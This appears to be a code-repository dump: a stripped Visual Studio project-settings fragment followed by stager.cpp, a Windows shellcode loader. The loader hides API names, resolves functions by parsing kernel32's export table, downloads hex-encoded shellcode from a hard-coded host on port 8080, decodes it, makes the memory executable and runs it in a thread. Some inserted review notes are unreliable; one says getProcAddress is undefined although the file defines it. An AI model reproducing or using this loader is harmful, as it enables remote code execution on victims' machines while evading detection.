53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | true
76 |
77 |
78 | false
79 |
80 |
81 | true
82 |
83 |
84 | false
85 |
86 |
87 |
88 | Level3
89 | true
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 | Level3
101 | true
102 | true
103 | true
104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 | true
111 | true
112 |
113 |
114 |
115 |
116 | Level3
117 | true
118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
119 | true
120 |
121 |
122 | Console
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | true
130 | true
131 | true
132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
133 | true
134 | MultiThreaded
135 | false
136 | Disabled
137 |
138 |
139 | Console
140 | true
141 | true
142 | true
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
--------------------------------------------------------------------------------
/stager/stager.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
// NOTE(review): the two #include targets above were lost in rendering; the
// Windows types used in this file (FARPROC, HMODULE, PVOID64, ...) come from
// the Windows SDK headers, and main() below also calls printf.
//
// Same bootstrap pair as Init.cpp.  getProcAddress() has no active definition
// in the repository — only the commented-out one in Function.cpp — so the
// project as shown will not link.  getKernel32() is the MASM routine in
// getProcAdddress.asm.
FARPROC getProcAddress(HMODULE hModuleBase);
extern "C" PVOID64 getKernel32();
6 |
7 | //#pragma comment(linker, "/SUBSYSTEM:WINDOWS")
8 |
// Local copy of the native UNICODE_STRING layout.
//
// NOTE(review): the SDK's own definition (winternl.h) declares the third field
// as PWSTR Buffer; here it is PUINT64, so only the two length fields match, and
// the name would clash if winternl.h were ever included in this translation
// unit.  In the visible code the type is referenced only by the commented-out
// getKernel32() below.
typedef struct _UNICODE_STRING
{
    WORD Length;          // byte length of the string (without terminator)
    WORD MaximumLength;   // byte size of the buffer
    PUINT64 Buffer;       // see note above: PWSTR in the SDK definition
} UNICODE_STRING, *PUNICODE_STRING;
15 |
16 | //HMODULE getKernel32()
17 | //{
18 | // PVOID64 Peb = (PVOID64)__readgsqword(0x60);
19 | // PVOID64 LDR_DATA_Addr = *(PVOID64**)((BYTE*)Peb + 0x18); //0x018是LDR相对于PEB偏移 存放着LDR的基地址
20 | // UNICODE_STRING* FullName;
21 | // HMODULE hKernel32 = NULL;
22 | // LIST_ENTRY64* pNode = NULL;
23 | // pNode = (LIST_ENTRY64*)(*(PVOID64**)((BYTE*)LDR_DATA_Addr + 0x30)); //偏移到InInitializationOrderModuleList
24 | // DWORD Count = 0;
25 | // while (true)
26 | // {
27 | // FullName = (UNICODE_STRING*)((BYTE*)pNode + 0x38);//BaseDllName基于InInitialzationOrderModuList的偏移
28 | // if (Count == 2)
29 | // {
30 | // hKernel32 = (HMODULE)(*((ULONG64*)((BYTE*)pNode + 0x10)));//DllBase
31 | // break;
32 | // }
33 | // pNode = (LIST_ENTRY64*)pNode->Flink;
34 | // Count++;
35 | // }
36 | // return hKernel32;
37 | //}
38 |
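// Length of a NUL-terminated string, counted in bytes (terminator excluded).
//
// Fixes the original's empty-string case: it computed `end - start` with `end`
// still NULL when the loop body never ran, which is undefined behaviour and in
// practice returned garbage.  A null pointer now yields 0 instead of faulting.
//
// Parameters:
//   p - pointer to a NUL-terminated byte string, or null.
// Returns: number of bytes before the first '\0'; 0 for "" or null.
int my_strlen(const char* p)
{
    if (!p)
    {
        return 0;
    }
    int len = 0;
    while (p[len] != '\0')
    {
        len++;
    }
    return len;
}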
50 |
51 | int main()
52 | {
53 | typedef FARPROC(WINAPI* FN_GetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
54 | typedef HMODULE(WINAPI* FN_LoadLibraryA)( LPCSTR lpLibFileName);
55 | typedef BOOL(WINAPI* FM_VirtualProtect)( LPVOID lpAddress, SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect);
56 | typedef PVOID(WINAPI* FM_VirtualAlloc)( LPVOID lpAddress, SIZE_T dwSize,DWORD flAllocationType, DWORD flProtect);
57 | typedef LPVOID(WINAPI* Fn_InternetOpenA)( LPCSTR lpszAgent, DWORD dwAccessType, LPCSTR lpszProxy, LPCSTR lpszProxyBypass,DWORD dwFlags);
58 | typedef LPVOID(WINAPI* Fn_InternetConnectA)( LPVOID hInternet, LPCSTR lpszServerName, WORD nServerPort, LPCSTR lpszUserName,LPCSTR lpszPassword,DWORD dwService,DWORD dwFlags, DWORD_PTR dwContext);
59 | typedef LPVOID(WINAPI* Fn_HttpOpenRequestA)( LPVOID hConnect, LPCSTR lpszVerb,LPCSTR lpszObjectName, LPCSTR lpszVersion,LPCSTR lpszReferrer,LPCSTR * lplpszAcceptTypes,DWORD dwFlags, DWORD_PTR dwContext);
60 | typedef BOOL(WINAPI* Fn_HttpSendRequestW)( LPVOID hRequest, LPCWSTR lpszHeaders,DWORD dwHeadersLength,LPVOID lpOptional,DWORD dwOptionalLength);
61 | typedef BOOL(WINAPI* Fn_InternetReadFile)( LPVOID hFile, LPVOID lpBuffer, DWORD dwNumberOfBytesToRead, LPDWORD lpdwNumberOfBytesRead);
62 | typedef BOOL(WINAPI* Fn_InternetCloseHandle)( LPVOID hInternet);
63 | typedef BOOL(WINAPI* Fn_VirtualFree)(LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType);
64 | typedef HANDLE(WINAPI* Fn_CreateThread)(LPSECURITY_ATTRIBUTES lpThreadAttributes,SIZE_T dwStackSize,LPTHREAD_START_ROUTINE lpStartAddress,LPVOID lpParameter,DWORD dwCreationFlags,LPDWORD lpThreadId);
65 | typedef NTSTATUS (WINAPI* Fn_RtlCharToInteger)(const char *String ,ULONG Base,PULONG Value);
66 |
67 |
68 | FN_GetProcAddress fn_GetProcAddress;
69 | FN_LoadLibraryA fn_LoadLibraryA;
70 | FM_VirtualAlloc fn_VirtualAlloc;
71 | FM_VirtualProtect fn_VirtualProtect;
72 | Fn_CreateThread fn_CreateThread;
73 | Fn_InternetOpenA fn_InternetOpenA;
74 | Fn_InternetConnectA fn_InternetConnectA;
75 | Fn_HttpOpenRequestA fn_HttpOpenRequestA;
76 | Fn_HttpSendRequestW fn_HttpSendRequestW;
77 | Fn_InternetReadFile fn_InternetReadFile;
78 | Fn_InternetCloseHandle fn_InternetCloseHandle;
79 | Fn_RtlCharToInteger fn_RtlCharToInteger;
80 | Fn_VirtualFree fn_VirtualFree;
81 |
82 | char xyLoadLibraryA[] = { 'L','o','a','d','L','i','b','r','a','r','y','A',0 };
83 | char xy_Virtualalloc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };
84 | char xy_VirtualProtectC[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t',0 };
85 | char xy_CreateThread[] = { 'C','r','e','a','t','e','T','h','r','e','a','d',0 };
86 | char xy_Wininet[] = { 'W','i','n','i','n','e','t','.','d','l','l',0 };
87 | char xy_InternetOpenA[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','A',0 };
88 | char xy_HttpSendRequestW[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };
89 | char xy_InternetReadFile[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };
90 | char xy_InternetConnectA[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','A',0 };
91 | char xy_HttpOpenRequestA[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','A',0 };
92 | char xy_InternetCloseHandle[] = { 'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e',0 };
93 | char xy_strtol[] = { 'R','t','l','C','h','a','r','T','o','I','n','t','e','g','e','r',0}; //RtlCharToInteger
94 | char xy_VirtualFree[] = {'V','i','r','t','u','a','l','F','r','e','e',0};
95 | char xy_ntdll[] = { 'n','t','d','l','l','.','d','l','l',0 };
96 |
97 | fn_GetProcAddress = (FN_GetProcAddress)getProcAddress((HMODULE)getKernel32());
98 | fn_LoadLibraryA = (FN_LoadLibraryA)fn_GetProcAddress((HMODULE)getKernel32(), xyLoadLibraryA);
99 | fn_RtlCharToInteger = (Fn_RtlCharToInteger)fn_GetProcAddress(fn_LoadLibraryA(xy_ntdll), xy_strtol);
100 | HANDLE hd = fn_LoadLibraryA(xy_Wininet);
101 | fn_VirtualAlloc = (FM_VirtualAlloc)fn_GetProcAddress((HMODULE)getKernel32(), xy_Virtualalloc);
102 | fn_VirtualProtect = (FM_VirtualProtect)fn_GetProcAddress((HMODULE)getKernel32(), xy_VirtualProtectC);
103 | fn_CreateThread = (Fn_CreateThread)fn_GetProcAddress((HMODULE)getKernel32(), xy_CreateThread);
104 | fn_VirtualFree = (Fn_VirtualFree)fn_GetProcAddress((HMODULE)getKernel32(), xy_VirtualFree);
105 | fn_InternetOpenA = (Fn_InternetOpenA)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetOpenA);
106 | fn_HttpSendRequestW = (Fn_HttpSendRequestW)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_HttpSendRequestW);
107 | fn_InternetReadFile = (Fn_InternetReadFile)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetReadFile);
108 | fn_InternetConnectA = (Fn_InternetConnectA)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetConnectA);
109 | fn_HttpOpenRequestA = (Fn_HttpOpenRequestA)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_HttpOpenRequestA);
110 | fn_InternetCloseHandle = (Fn_InternetCloseHandle)fn_GetProcAddress(fn_LoadLibraryA((LPCSTR)xy_Wininet), xy_InternetCloseHandle);
111 |
112 | if (fn_InternetCloseHandle)
113 | {
114 | printf("%p\r\n", fn_InternetCloseHandle);
115 | }
116 |
117 | DWORD BUFFER_SIZE = 0x1000000; //我无法确定shellcode的大小,所以我尽可能开辟一个足够大的空间
118 | char UA[] = { 'M','o','z', 'i', 'l', 'l', 'a', '/', '5', '.', '0', '(', 'W', 'i', 'n', 'd', 'o', 'w', 's', ' ', 'N', 'T', '1', '0', '.', '0', ';', ' ', 'W', 'i', 'n', '6', '4',';',' ','x','6','4',')',' ',0 };
119 | char http[] = { 'H','T','T','P','/','1','.','0',0 };
120 |
121 | DWORD wrt;
122 | char IP[] = { '1','9','2','.','1','6','8','.','9','8','.','1','2','9',0 };
123 | char file[] = { 't','e','s','t','.','t','x','t',0 };
124 |
125 | //初始化
126 | LPVOID Readbuffer = 0;
127 | LPVOID hInternet = fn_InternetOpenA(UA, 1, NULL, NULL, 0);
128 | //链接
129 | DWORD_PTR dwContext = 0;
130 | LPVOID hConnect = fn_InternetConnectA(hInternet, IP, 8080, NULL, NULL, 3, 0x10000000, dwContext);
131 | //使用Get
132 | LPVOID hRequest = fn_HttpOpenRequestA(hConnect, NULL, file, http, NULL, NULL, 0x4C8200, 0);
133 |
134 | if (fn_HttpSendRequestW(hRequest, NULL, 0, NULL, 0))
135 | {
136 | Readbuffer = fn_VirtualAlloc(0, BUFFER_SIZE, MEM_COMMIT, PAGE_READWRITE);
137 | DWORD Buffer_Count = 0;
138 | while (fn_InternetReadFile(hRequest, (LPVOID)((DWORD)Readbuffer + Buffer_Count), 0x2000, &wrt))
139 | {
140 | Buffer_Count += 0x2000;
141 | if (wrt == 0)
142 | {
143 | break;
144 | }
145 | }
146 | fn_InternetCloseHandle(hInternet);
147 | fn_InternetCloseHandle(hConnect);
148 | fn_InternetCloseHandle(hRequest);
149 | }
150 |
151 | const char* hex = (char *)Readbuffer;
152 |
153 | DWORD StrSize = my_strlen(hex);
154 | DWORD MemSize = StrSize / 2;
155 |
156 | PVOID numbuf = fn_VirtualAlloc(NULL, StrSize, MEM_COMMIT, PAGE_READWRITE);
157 | char* Resstr = (char *)fn_VirtualAlloc(NULL, StrSize, MEM_COMMIT, PAGE_READWRITE);
158 | WORD* tmp = (WORD*)fn_VirtualAlloc(NULL,sizeof(WORD*),MEM_COMMIT,PAGE_READWRITE);
159 | PVOID buffer = fn_VirtualAlloc(NULL, StrSize, MEM_COMMIT, PAGE_READWRITE);
160 |
161 | ULONGLONG BufferCount = 0;
162 | BYTE num = 0;
163 | DWORD p = 0;
164 |
165 | //倒置
166 | for (int i = StrSize - 1; i >= 0; i--)
167 | {
168 | Resstr[p++] = hex[i];
169 | }
170 |
171 | //sscanf
172 | for (int i = 0; i < StrSize; i += 2)
173 | {
174 | *tmp = *(WORD*)(Resstr + i);
175 | fn_RtlCharToInteger((const char*)tmp, 16, (PULONG)numbuf); // number base 16
176 | num = *(BYTE*)numbuf;
177 | *tmp = (BYTE)num;
178 | *((char*)(ULONGLONG)buffer + BufferCount) = *tmp; //这里如果自己实现一个标准的memcpy,因为字符串长度比较大,所以效率会比较低,所以我选择直接操作指针。
179 | //my_memcpy((PVOID)((ULONGLONG)buffer + BufferCount), tmp, 1);
180 | BufferCount++;
181 | }
182 | fn_VirtualFree(Readbuffer,0, MEM_RELEASE);
183 | fn_VirtualFree(numbuf, 0, MEM_RELEASE);
184 | fn_VirtualFree(tmp, 0, MEM_RELEASE);
185 |
186 | DWORD Oldprotect = 0;
187 | fn_VirtualProtect(buffer, MemSize, PAGE_EXECUTE_READWRITE, &Oldprotect);
188 | HANDLE thba = fn_CreateThread(0, 0, (LPTHREAD_START_ROUTINE)buffer, 0, 0, 0);
189 | WaitForSingleObject(thba, -1);
190 | return 0;
191 |
192 | }
193 |
194 | FARPROC getProcAddress(HMODULE hModuleBase) // Walks the export directory of the image at hModuleBase and returns the exported "GetProcAddress" entry, or NULL. Nothing here goes through the import table, so a static import listing of the binary will not show this resolution.
195 | {
196 | PIMAGE_DOS_HEADER lpDosHeader = (PIMAGE_DOS_HEADER)hModuleBase; // no e_magic check: hModuleBase is trusted to be a mapped PE image
197 | PIMAGE_NT_HEADERS64 lpNtHeader = (PIMAGE_NT_HEADERS64)((ULONG64)hModuleBase + lpDosHeader->e_lfanew); // 64-bit headers only; no Signature check either
198 | if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) { // image exports nothing
199 | return NULL;
200 | }
201 | if (!lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) {
202 | return NULL;
203 | }
204 | PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)((ULONG64)hModuleBase + (ULONG64)lpNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
205 | PDWORD lpdwFunName = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNames); // RVAs of the export name strings
206 | PWORD lpword = (PWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfNameOrdinals); // name index -> function-table index
207 | PDWORD lpdwFunAddr = (PDWORD)((ULONG64)hModuleBase + (ULONG64)lpExports->AddressOfFunctions); // RVAs of the exported functions
208 |
209 | DWORD dwLoop = 0;
210 | FARPROC pRet = NULL;
211 | for (; dwLoop <= lpExports->NumberOfNames - 1; dwLoop++) { // NOTE(review): DWORD arithmetic — if NumberOfNames is 0 the bound wraps to 0xFFFFFFFF and the loop reads past the tables
212 | char* pFunName = (char*)(lpdwFunName[dwLoop] + (ULONG64)hModuleBase);
213 |
214 | if (pFunName[0] == 'G' && // hand-rolled prefix compare against "GetProcAddress" (avoids a string literal and any strcmp import)
215 | pFunName[1] == 'e' &&
216 | pFunName[2] == 't' &&
217 | pFunName[3] == 'P' &&
218 | pFunName[4] == 'r' &&
219 | pFunName[5] == 'o' &&
220 | pFunName[6] == 'c' &&
221 | pFunName[7] == 'A' &&
222 | pFunName[8] == 'd' &&
223 | pFunName[9] == 'd' &&
224 | pFunName[10] == 'r' &&
225 | pFunName[11] == 'e' &&
226 | pFunName[12] == 's' &&
227 | pFunName[13] == 's') // NOTE(review): only the first 14 bytes are compared; the terminator is never checked, so the match relies on "GetProcAddress" sorting before any longer export with the same prefix
228 | {
229 | pRet = (FARPROC)(lpdwFunAddr[lpword[dwLoop]] + (ULONG64)hModuleBase); // presumably a plain (non-forwarded) export; a forwarder RVA would point at a string, not code — not handled here
230 | break;
231 | }
232 | }
233 | return pRet; // NULL when no name matched
234 | }
235 |
236 |
237 |
--------------------------------------------------------------------------------